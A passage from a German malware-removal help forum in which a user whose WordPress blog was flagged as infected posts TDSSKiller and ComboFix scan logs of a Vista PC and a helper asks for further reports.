01:20:00.0646 5804 [ AC13CB789D93412106B0FB6C7EB2BCB6 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
01:20:00.0678 5804 WUDFRd - ok
01:20:00.0709 5804 [ 575A4190D989F64732119E4114045A4F ] wudfsvc C:\Windows\System32\WUDFSvc.dll
01:20:00.0849 5804 wudfsvc - ok
01:20:00.0880 5804 [ 7D1F3B131D503EF43EE594B5A2B9B427 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
01:20:00.0927 5804 yukonwlh - ok
01:20:00.0943 5804 ================ Scan global ===============================
01:20:00.0974 5804 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
01:20:01.0005 5804 [ F42F8855CB5C22E203C6672B124F17FD ] C:\Windows\system32\winsrv.dll
01:20:01.0099 5804 [ F42F8855CB5C22E203C6672B124F17FD ] C:\Windows\system32\winsrv.dll
01:20:01.0192 5804 [ 2B336AB6286D6C81FA02CBAB914E3C6C ] C:\Windows\system32\services.exe
01:20:01.0255 5804 [Global] - ok
01:20:01.0255 5804 ================ Scan MBR ==================================
01:20:01.0270 5804 [ 64B1E91C5C6C2157642651010728F90F ] \Device\Harddisk0\DR0
01:20:01.0660 5804 \Device\Harddisk0\DR0 - ok
01:20:01.0660 5804 ================ Scan VBR ==================================
01:20:01.0660 5804 [ 0D067BF29C7DB9186A70435FDB0E981D ] \Device\Harddisk0\DR0\Partition1
01:20:01.0676 5804 \Device\Harddisk0\DR0\Partition1 - ok
01:20:01.0676 5804 ============================================================
01:20:01.0676 5804 Scan finished
01:20:01.0676 5804 ============================================================
01:20:01.0692 3516 Detected object count: 5
01:20:01.0692 3516 Actual detected object count: 5
|
|
03.03.2013, 20:19
| #10 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten natürlich brauchst du das, alle Updates sind wichtig. Scan mit Combofix
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
04.03.2013, 01:23
| #11 |
| | Wordpress Blog infiziert Mail von Google erhalten Guten Abend, also nachdem ich Combofix gestartet habe, hat sich nach den Ladebalken nichts mehr getan. Ein zweites mal angeführt, kam eine Meldung, dass er eine bestimmte Datei nicht überschreiben kann. Ich habs ignoriert und danach das Selbe Spiel. Nach dem die Balken geladen haben ist nichts mehr passiert. Gruß Edit: Danach hat es gestartet, hier ist der Code: Code:
ATTFilter ComboFix 13-03-03.01 - DBoy 04.03.2013 1:27.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.49.1031.18.3070.1980 [GMT 1:00]
ausgeführt von:: c:\users\DBoy\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Disabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((( Weitere Löschungen ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\install.exe
c:\program files\Common Files\ASPG_icon.ico
c:\users\Public\sdelevURL.tmp
.
.
((((((((((((((((((((((( Dateien erstellt von 2013-02-04 bis 2013-03-04 ))))))))))))))))))))))))))))))
.
.
2013-03-04 00:40 . 2013-03-04 00:40 -------- d-----w- c:\users\Default\AppData\Local\temp
2013-03-03 23:09 . 2013-03-03 23:13 -------- d-----w- c:\windows\system32\ca-ES
2013-03-03 23:09 . 2013-03-03 23:12 -------- d-----w- c:\windows\system32\eu-ES
2013-03-03 23:09 . 2013-03-03 23:12 -------- d-----w- c:\windows\system32\vi-VN
2013-03-03 22:57 . 2013-03-03 22:57 -------- d-----w- c:\windows\system32\SPReview
2013-03-03 22:30 . 2009-04-10 22:28 928768 ----a-w- c:\windows\system32\scavenge.dll
2013-03-03 22:29 . 2009-04-10 22:27 57856 ----a-w- c:\windows\system32\compcln.exe
2013-03-03 22:25 . 2009-04-10 22:32 141288 ----a-w- c:\windows\system32\drivers\ecache.sys
2013-03-03 22:24 . 2009-04-10 22:28 75264 ----a-w- c:\windows\system32\adsmsext.dll
2013-03-03 22:23 . 2009-04-10 22:28 217600 ----a-w- c:\windows\system32\InkEd.dll
2013-03-03 22:22 . 2009-04-10 22:28 76288 ----a-w- c:\windows\system32\iassvcs.dll
2013-03-03 22:21 . 2009-04-10 22:32 17896 ----a-w- c:\windows\system32\kd1394.dll
2013-03-03 22:20 . 2009-04-10 22:32 53224 ----a-w- c:\windows\system32\drivers\termdd.sys
2013-03-03 22:20 . 2009-04-10 22:28 615424 ----a-w- c:\windows\system32\themeui.dll
2013-03-03 22:20 . 2009-04-10 22:28 449024 ----a-w- c:\windows\system32\termsrv.dll
2013-03-03 22:20 . 2009-04-10 22:28 380416 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tiptsf.dll
2013-03-03 22:20 . 2009-04-10 22:28 313344 ----a-w- c:\windows\system32\thawbrkr.dll
2013-03-03 22:20 . 2009-04-10 22:28 242688 ----a-w- c:\windows\system32\tapisrv.dll
2013-03-03 22:20 . 2009-04-10 22:28 170496 ----a-w- c:\windows\system32\tcpipcfg.dll
2013-03-03 22:20 . 2009-04-10 22:28 1576960 ----a-w- c:\windows\system32\tquery.dll
2013-03-03 22:20 . 2009-04-10 22:28 135168 ----a-w- c:\windows\system32\tcpmon.dll
2013-03-03 22:20 . 2009-04-10 22:28 1305600 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll
2013-03-03 22:20 . 2009-04-10 22:28 1152000 ----a-w- c:\windows\system32\themecpl.dll
2013-03-03 22:20 . 2009-04-10 22:23 125952 ----a-w- c:\windows\system32\tintlgnt.ime
2013-03-03 22:20 . 2009-04-10 20:45 72192 ----a-w- c:\windows\system32\drivers\tdx.sys
2013-03-03 22:15 . 2013-03-03 22:15 -------- d-----w- c:\windows\system32\EventProviders
2013-03-02 21:58 . 2013-03-02 22:18 -------- d-----w- c:\users\DBoy\AppData\Roaming\DocFetcher
2013-03-02 21:57 . 2013-03-02 21:57 -------- d-----w- c:\program files\DocFetcher
2013-03-02 21:57 . 2013-03-02 21:57 -------- d-----w- c:\program files\Common Files\Java
2013-03-02 21:56 . 2013-03-02 21:55 472808 ----a-w- c:\windows\system32\deployJava1.dll
2013-03-02 21:55 . 2013-03-02 21:55 -------- d-----w- c:\program files\Java
2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\users\DBoy\AppData\Roaming\Malwarebytes
2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\programdata\Malwarebytes
2013-03-02 18:53 . 2013-03-02 18:53 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2013-03-02 18:53 . 2012-12-14 15:49 21104 ----a-w- c:\windows\system32\drivers\mbam.sys
2013-03-02 12:30 . 2013-03-02 12:30 -------- d-----w- c:\users\DBoy\AppData\Roaming\OpenOffice.org
2013-03-02 12:27 . 2013-03-02 12:27 -------- d-----w- c:\program files\OpenOffice.org 3
2013-02-28 17:42 . 2011-06-21 10:24 32768 ----a-w- c:\windows\system32\drivers\sp_rsdrv2.sys
2013-02-22 14:07 . 2013-02-22 14:07 -------- d-----w- c:\program files\TeamViewer
2013-02-19 23:21 . 2013-02-20 14:33 -------- d-----w- c:\program files\Mozilla Thunderbird
2013-02-03 14:04 . 2013-02-03 14:04 -------- d-----w- c:\program files\MSXML 4.0
2013-02-03 13:49 . 2009-02-19 08:50 483328 ----a-w- c:\windows\ssndii.exe
2013-02-03 13:49 . 2008-03-11 20:10 82432 ----a-w- c:\windows\system32\msxml4r.dll
2013-02-03 13:49 . 2008-03-11 20:10 44544 ----a-w- c:\windows\system32\msxml4a.dll
2013-02-03 13:49 . 2008-03-11 20:10 38160 ----a-w- c:\windows\system32\msxml2r.dll
2013-02-03 13:49 . 2008-03-11 20:10 701440 ----a-w- c:\windows\system32\msxml2.dll
2013-02-03 13:49 . 2008-03-11 20:10 21776 ----a-w- c:\windows\system32\msxml2a.dll
2013-02-03 13:49 . 2007-06-27 08:56 19968 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\spd__pc.dll
2013-02-03 13:46 . 2009-03-24 08:46 137384 ----a-w- c:\windows\system32\SUPDSvcA.dll
2013-02-03 13:46 . 2009-03-24 08:45 127656 ----a-w- c:\windows\system32\SUPDSvc.exe
2013-02-03 13:46 . 2009-03-24 07:55 217600 ----a-w- c:\windows\system32\SIPDUtil.dll
2013-02-03 13:46 . 2008-06-04 14:53 26624 ----a-w- c:\windows\system32\spd__l3.dll
2013-02-03 13:46 . 2009-03-02 13:45 339968 ----a-w- c:\windows\system32\DscPnt1.dll
2013-02-03 13:46 . 2009-03-01 09:55 229376 ----a-w- c:\windows\system32\DscPnt.dll
2013-02-03 13:46 . 2009-03-01 09:55 233472 ----a-w- c:\windows\system32\DscPnt0.dll
2013-02-03 13:46 . 2007-10-02 18:21 151552 ----a-w- c:\windows\system32\spd__ci.exe
2013-02-03 13:46 . 2007-10-02 18:21 65536 ----a-w- c:\windows\system32\spd__ci.dll
2013-02-03 13:46 . 2008-11-10 14:00 5120 ------w- c:\windows\system32\drivers\SSPORT.SYS
2013-02-03 13:46 . 2013-02-03 13:46 -------- d-----w- c:\program files\Samsung
2013-02-03 13:46 . 2013-02-03 13:46 -------- d-----w- C:\Temp
2013-02-03 13:41 . 2013-02-03 13:41 -------- d-----w- c:\program files\Common Files\SWF Studio
2013-02-03 13:40 . 2013-02-03 13:49 -------- d-----w- c:\windows\Samsung
2013-02-03 13:39 . 2013-02-03 13:39 -------- d-----w- c:\program files\EazelBar
.
.
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2013-02-27 17:13 . 2012-11-12 17:31 71024 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2013-02-27 17:13 . 2012-11-12 17:31 691568 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-12-26 15:20 . 2012-11-12 04:20 230796401 ----a-w- c:\windows\DUMP32e2.tmp
2012-12-26 15:01 . 2012-11-12 04:20 165376913 ----a-w- c:\windows\DUMP3265.tmp
2012-12-12 18:02 . 2012-11-12 17:00 83944 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2012-12-12 18:02 . 2012-11-12 17:00 134336 ----a-w- c:\windows\system32\drivers\avipbb.sys
2008-07-02 03:28 . 2008-07-02 03:28 61440 ----a-w- c:\program files\Common Files\CPInstallAction.dll
2013-02-20 15:20 . 2013-02-20 15:20 263064 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{00000000-6E41-4FD3-8538-502F5495E5FC}"= "c:\program files\Ask.com\GenericAskToolbar.dll" [2012-10-29 1521872]
.
[HKEY_CLASSES_ROOT\clsid\{00000000-6e41-4fd3-8538-502f5495e5fc}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\~\Browser Helper Objects\{FE478DC2-E4AD-4197-8F80-5E456BEBC57F}]
2012-06-13 12:31 492032 ----a-w- c:\program files\EazelBar\Toolbar32.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{EBD839AE-B08C-4fb7-859B-F54AF16C159F}"= "c:\program files\EazelBar\Toolbar32.dll" [2012-06-13 492032]
.
[HKEY_CLASSES_ROOT\clsid\{ebd839ae-b08c-4fb7-859b-f54af16c159f}]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ADSMOverlayIcon1]
@="{A8D448F4-0431-45AC-9F5E-E1B434AB2249}"
[HKEY_CLASSES_ROOT\CLSID\{A8D448F4-0431-45AC-9F5E-E1B434AB2249}]
2007-06-02 01:08 143360 ----a-w- c:\program files\ASUS\ASUS Data Security Manager\OverlayIconShlExt1.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-10 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-08-30 61440]
"ATKOSD2"="c:\program files\ASUS\ATKOSD2\ATKOSD2.exe" [2008-07-15 7651328]
"RtHDVCpl"="RtHDVCpl.exe" [2008-07-16 6253088]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-12-06 1029416]
"ADSMTray"="c:\program files\ASUS\ASUS Data Security Manager\ADSMTray.exe" [2008-04-01 266240]
"ATKMEDIA"="c:\program files\ASUS\ATK Media\DMedia.exe" [2008-06-25 159744]
"ASUSTPE"="c:\windows\system32\ASUSTPE.exe" [2007-10-12 106496]
"ASUS Camera ScreenSaver"="c:\windows\AsScrProlog.exe" [2012-11-12 47672]
"ASUS Screen Saver Protector"="c:\windows\ASScrPro.exe" [2012-11-12 33136]
"ApnUpdater"="c:\program files\Ask.com\Updater\Updater.exe" [2012-10-29 1573584]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2013-02-12 385248]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-11-28 59280]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-12-12 152544]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-07-27 919008]
"Samsung PanelMgr"="c:\windows\Samsung\PanelMgr\SSMMgr.exe" [2009-02-04 548864]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2011-06-09 254696]
"Skytel"="Skytel.exe" [2008-07-16 1833504]
.
c:\users\DBoy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
OpenOffice.org 3.4.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2012-8-13 1199104]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ scecli c:\program files\ASUS\ASUS Data Security Manager\ASPWDFLT
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
bthsvcs REG_MULTI_SZ BthServ
.
Inhalt des "geplante Tasks" Ordners
.
2013-03-04 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-11-12 17:13]
.
2013-03-03 c:\windows\Tasks\User_Feed_Synchronization-{DA6E10C5-8C26-4239-930B-F93C091E7ABE}.job
- c:\windows\system32\msfeedssync.exe [2008-01-21 02:24]
.
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://search.eazel.com?id=A8753F0C2B594A0DB594C667F621AFEB
uInternet Settings,ProxyOverride = *.local
IE: Free YouTube to MP3 Converter - c:\users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm
LSP: c:\program files\Avira\AntiVir Desktop\avsda.dll
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c:\users\DBoy\AppData\Roaming\Mozilla\Firefox\Profiles\v1trl7q1.default\
FF - prefs.js: browser.search.selectedEngine - Ask.com
FF - prefs.js: keyword.URL - hxxp://websearch.ask.com/redirect?client=ff&src=kw&tb=AVR-4&o=APN10261&locale=de_DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_ptnrs=%5EAGS&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7&apn_dtid=%5EYYYYYY%5EYY%5EDE&&q=
FF - ExtSQL: 2013-02-04 12:26; {EBD839AE-B08C-4fb7-859B-F54AF16C159F}; c:\program files\EazelBar\Firefox
FF - ExtSQL: 2013-03-02 22:56; {CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}; c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
URLSearchHooks-{16CC3586-3547-4025-9E2F-F04C365D8B90} - (no file)
HKCU-Run-DocFetcher-Daemon - c:\program files\DocFetcher\docfetcher-daemon-win.exe
HKLM-Run-Zshutdown - c:\preload\patch\sysprep.cmd
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net
Rootkit scan 2013-03-04 01:41
Windows 6.0.6002 Service Pack 2 NTFS
.
Scanne versteckte Prozesse...
.
Scanne versteckte Autostarteinträge...
.
Scanne versteckte Dateien...
.
.
C:\ADSM_PData_0150
.
Scan erfolgreich abgeschlossen
versteckte Dateien: 1
.
**************************************************************************
.
--------------------- Durch laufende Prozesse gestartete DLLs ---------------------
.
- - - - - - - > 'lsass.exe'(656)
c:\program files\ASUS\ASUS Data Security Manager\ASPWDFLT.dll
.
Zeit der Fertigstellung: 2013-03-04 01:44:47
ComboFix-quarantined-files.txt 2013-03-04 00:44
.
Vor Suchlauf: 7 Verzeichnis(se), 194.249.220.096 Bytes frei
Nach Suchlauf: 10 Verzeichnis(se), 193.986.506.752 Bytes frei
.
- - End Of File - - 3E29E200BDB6DA603B99D3C5759DACF6
|
|
04.03.2013, 17:45
| #12 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten wieso wurde Malwarebytes instaliert und wo sind die berichte? http://www.trojaner-board.de/125889-...en-posten.html
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
04.03.2013, 22:23
| #13 |
| | Wordpress Blog infiziert Mail von Google erhalten Hi, mein Kumpel hat es installiert und durchlaufen gelassen, weil er so davon überzeugt war. Hat aber nur den Keylogger gefunden. Combofix hat mir nur die Datei angezeigt, keine Funde. Gruß |
|
05.03.2013, 14:53
| #14 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten und wo ist der bericht?
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
05.03.2013, 20:54
| #15 |
| | Wordpress Blog infiziert Mail von Google erhalten Das da oben ist die Combofix.txt Datei, mehr hab ich nicht gefunden. |
|
| Themen zu Wordpress Blog infiziert Mail von Google erhalten |
| anfrage, anfragen, code, entdeck, entdeckt, erhalte, erhalten, frage, fragen, geschickt, google, iframe, infiziert, leute, löschen, mail, schnelle, schnelle hilfe, thread, verdächtig, verzweifel, verzweifeln, wordpress, worte |
WARNUNG an die MITLESER: 
Linear-Darstellung
